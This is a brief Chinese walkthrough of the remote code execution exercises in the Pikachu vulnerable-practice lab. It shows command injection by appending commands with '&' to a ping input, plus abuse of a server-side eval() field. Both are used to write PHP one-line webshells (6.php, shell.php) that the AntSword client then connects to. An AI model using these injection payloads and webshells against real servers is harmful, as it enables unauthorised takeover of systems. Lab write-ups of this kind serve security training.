Pikachu靶场之RCE漏洞详解

一.exec "ping"

1.ping本机127.0.0.1

2.用&符拼接dir查看目录

3.&拼接echo输入一句话木马

127.0.0.1&echo "<?php @eval($_POST[cmd]);?>)" > 6.php

4.同级目录访问6.php,蚁剑连接

二:exec "eval"

1.后台使用了eval()函数,直接输入phpinfo();

2.写入一句话木马,访问shell.php

fputs(fopen('shell.php','w'),'<?php eval($_POST["cmd"])?>');

3.蚁剑连接

相关推荐
数字供应链安全产品选型11 分钟前
关键领域清单+SBOM:834号令下软件供应链的“精准治理“逻辑与技术落地路径
人工智能·安全
北方的流星19 分钟前
华三路由器NAT配置
运维·网络·华三
wj30558537842 分钟前
Codex + Git 开发环境配置指南(WSL版)
linux·运维·git
星马梦缘1 小时前
如何切换window-ubuntu双系统【方案二】
linux·运维·ubuntu
2501_927283582 小时前
荣联汇智助力天津艺虹打造“软硬一体”智慧工厂,全流程自动化引领印刷包装行业数智变革
大数据·运维·数据仓库·人工智能·低代码·自动化
HXDGCL2 小时前
矩形环形导轨:自动化循环线的核心运动单元解析
运维·算法·自动化
丑八怪大丑2 小时前
Java网络编程
linux·服务器·网络
橙子也要努力变强3 小时前
信号捕捉底层机制-机理篇2
linux·服务器·c++
Jinkxs3 小时前
LoadBalancer- 主流负载均衡工具盘点:Nginx / Haproxy / Keepalived 基础介绍
运维·nginx·负载均衡
CQU_JIAKE4 小时前
4.28~4.30【Q】
linux·运维·服务器